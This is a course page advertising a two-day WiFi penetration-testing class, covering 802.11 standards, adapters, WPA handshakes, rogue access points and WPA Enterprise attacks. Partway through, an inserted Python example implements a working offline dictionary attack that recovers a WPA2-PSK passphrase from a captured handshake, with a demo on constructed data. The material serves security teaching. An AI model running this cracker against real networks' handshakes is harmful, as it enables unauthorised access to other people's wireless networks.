
WiFi Exploitation 101

Description

Currently, this course is offered as an instructor-led 2-day online class. It consists of lectures, demonstrations, and 12 hands-on labs that help you master the tools and techniques needed for WiFi penetration testing and vulnerability assessment.

[Image: an AWUS036ACM adapter, and screenshots of Kismet, hostapd-mana, asleap, hashcat, and Wireshark]

We will start with the IEEE 802.11 basics: the standard itself and what each amendment brings to the table, as well as channels and frequency bands, from the original 802.11 on the 2.4 GHz ISM band, to 802.11ax, which uses MIMO and operates on the 2.4, 5, and 6 GHz bands, and on to 802.11be, aka WiFi 7, which will be finalized this year.

While these bands are license-free, we still have to abide by the ever-changing regulations around the world, even during a penetration test, and you will learn how to ensure your system does too.

You will also learn about the various network structures for WiFi networks, as well as the terminology, enabling you to understand the various tools we will be using.

Hardware matters significantly when doing a WiFi penetration test or a vulnerability assessment, as not every WiFi adapter works, is dependable, or has the capabilities required for this type of work. We will discuss recommended adapters and their capabilities, as well as how to select the right one for the job.

Equally important is the software used, including the OS and the drivers. Hardware is useless without quality software. We'll briefly go over the available Linux distributions for WiFi penetration testing, wireless drivers, and other considerations when choosing hardware and software.

From here, we'll move into learning about the different frames that are encountered on WiFi networks, including a brief exploration with Wireshark and a number of packet capture files, as well as live capture.

Afterward, we will cover the various encryption options found on Wi-Fi networks (and, in one case, the lack of any):

  • Open networks, which have no encryption
  • WEP
  • OWE, also known as Enhanced Open
  • WPA (1), WPA2, and WPA3

For WPA, we'll go over what differentiates WPA Personal (Pre-Shared Key, or PSK) from WPA Enterprise. We'll learn the details of the WPA 4-way handshake, which is used on both Personal and Enterprise networks, and practice different techniques to exploit WPA-PSK networks, including leveraging rogue access points.
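The offline attack practiced against WPA-PSK networks, as an added example that is not part of the FinchSec course material: the PMK is derived from the passphrase and SSID with PBKDF2, the PTK is expanded from the PMK plus both MAC addresses and both nonces, and the MIC on message 2 of the 4-way handshake is recomputed for every candidate passphrase. Capturing that one frame (plus the ANonce from message 1) is therefore all an attacker needs. The SSID, MAC addresses, nonces and wordlist below are constructed; only the PBKDF2 vector in the test comes from the IEEE 802.11 standard.

```python
"""Offline WPA/WPA2-PSK recovery from a captured 4-way handshake.

Added example, not FinchSec course code. The SSID, addresses, nonces and
wordlist are constructed for illustration.
"""
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # MIC field starts at byte 81 of the 802.1X EAPOL-Key frame
MIC_LEN = 16

# Constructed RSN IE: WPA2-PSK with CCMP for both pairwise and group cipher.
RSN_IE_PSK_CCMP = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11 PRF-512 used to derive the PTK.

    B = min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)
    PTK = HMAC-SHA1(PMK, label || 0x00 || B || i) for i = 0..3, truncated to 64 bytes.
    """
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):
        out += hmac.new(pmk, label + b"\x00" + b + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed.

    The key descriptor version (low 3 bits of Key Information, bytes 5-6)
    selects the algorithm: 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1-128 (WPA2/CCMP).
    """
    version = struct.unpack(">H", eapol[5:7])[0] & 0x7
    algo = {1: hashlib.md5, 2: hashlib.sha1}[version]
    zeroed = eapol[:MIC_OFFSET] + bytes(MIC_LEN) + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, algo).digest()[:MIC_LEN]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol2, wordlist):
    """Dictionary attack: return the passphrase whose derived KCK validates the
    MIC of the captured message 2, or None if no candidate matches."""
    captured_mic = eapol2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)          # the expensive step
        kck = prf_512(pmk, aa, spa, anonce, snonce)[:16]    # KCK = first 128 bits of PTK
        if hmac.compare_digest(eapol_mic(kck, eapol2), captured_mic):
            return candidate
    return None


def build_msg2(kck: bytes, snonce: bytes, replay_counter: int = 1,
               key_data: bytes = RSN_IE_PSK_CCMP) -> bytes:
    """Construct a WPA2 (descriptor version 2) message 2 as a supplicant would:
    Key Information 0x010a = version 2 | pairwise | MIC bit set."""
    body = struct.pack(">BHHQ", 0x02, 0x010a, 0, replay_counter)   # type, key info, key len, replay
    body += snonce + bytes(16) + bytes(8) + bytes(8) + bytes(MIC_LEN)  # nonce, IV, RSC, key ID, MIC
    body += struct.pack(">H", len(key_data)) + key_data
    frame = struct.pack(">BBH", 1, 3, len(body)) + body             # 802.1X v1, type 3 (EAPOL-Key)
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]


def demo() -> str:
    """Build a constructed handshake for a known passphrase and recover it."""
    ssid = "FinchSec-Lab"                          # constructed
    aa = bytes.fromhex("02000000aa01")             # constructed AP (authenticator) MAC
    spa = bytes.fromhex("020000005501")            # constructed client (supplicant) MAC
    anonce = bytes(range(32))                      # constructed ANonce (from message 1)
    snonce = bytes(range(100, 132))                # constructed SNonce (from message 2)
    true_psk = "correct horse"
    kck = prf_512(pmk_from_passphrase(true_psk, ssid), aa, spa, anonce, snonce)[:16]
    msg2 = build_msg2(kck, snonce)
    wordlist = ["password", "letmein1", "correct horse", "Summer2024!"]
    return crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The PBKDF2 step is where all the cost sits (4096 HMAC-SHA1 rounds per candidate), which is why aircrack-ng, John and hashcat spend their effort there and why the PMK can be precomputed per SSID; everything after it is cheap.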

Then, we'll cover WPA Enterprise and EAP, with the numerous authentication methods and encapsulations available. We'll focus on PEAP-MSCHAPv2 and go over the details of this two-phase exchange itself. We'll see how it looks in a packet capture and cover attacking and exploiting this type of network setup.


Who should take this course?

Anyone beginning a career in information security or network administration can benefit from this course. It is designed as a beginner to intermediate course and can also be useful to information security professionals looking to expand their skill set and/or learn WiFi penetration testing.

Overview

This class combines course materials with 12 hands-on labs for practice. The following topics are covered in the course:

  • IEEE 802.11 and the WiFi Alliance
  • Channels and frequencies
  • Regulatory Domain
  • Network structure, terminology, and modes
  • Encryption on Wi-Fi networks
  • OS, drivers, and Wi-Fi hardware
  • State machine and introduction to 802.11 frames
  • Penetration testing distributions
  • Wi-Fi adapter capabilities
  • Packet capture and injection
  • WPA and its handshakes
  • WPA-PSK and exploitation
  • Rogue Access Points
  • Wordlist generation
  • WPA Enterprise and exploitation

Major tools covered

  • Aircrack-ng suite
  • Kismet
  • Wireshark
  • hostapd-mana
  • asleap
  • John the ripper
  • Hashcat

What you'll get

  • A customized Kali Linux (x86-64) virtual machine for the hands-on labs
  • Hands-on labs
  • Full access to the alumni-only section of our Discord Server

Hardware requirements

A recent computer with:

  • One free USB-A port
  • x86 64-bit CPU (Macs with M1, M2, or M3 CPUs are NOT supported at this time)
  • 8 GB+ RAM
  • 25 GB+ of free disk space
  • VMware Workstation v9.0+, or Player v5.0+, or Fusion 12.0+
  • Webcam for live classes
  • Headset for live classes (optional, but recommended)

The hands-on labs require:

  • A spare access point
  • A wireless adapter supported on Kali Linux and capable of at least 802.11n, monitor mode, and AP mode
  • A spare Wi-Fi client device: an Android or iOS device, or an extra computer (separate from the one used during this class)

Our recommendations

We recommend the following hardware for the successful completion of the hands-on labs:

For the best experience in the labs, we recommend the latest version of VMware Workstation/Player (17.5) or Fusion (13.5), along with a USB 3.0 port.

While not mandatory, we also suggest students have a basic familiarity with networking, Linux, and the command line.

In addition to using the hands-on labs for practice, we strongly believe that taking notes is an integral part of the learning process. For that reason, we recommend all students attend class with a notebook and pen or pencil. If you do prefer to take notes digitally, we recommend tools like OneNote, Obsidian, or any other text application of your choice.

Dual monitors are preferable as they offer the opportunity to have the class on one monitor, and the labs or note-taking on the other monitor.

Course pricing

All prices are in U.S. dollars.

  • Online live class: starting at $499
  • Self-paced: get notified when available

Ready to start your journey?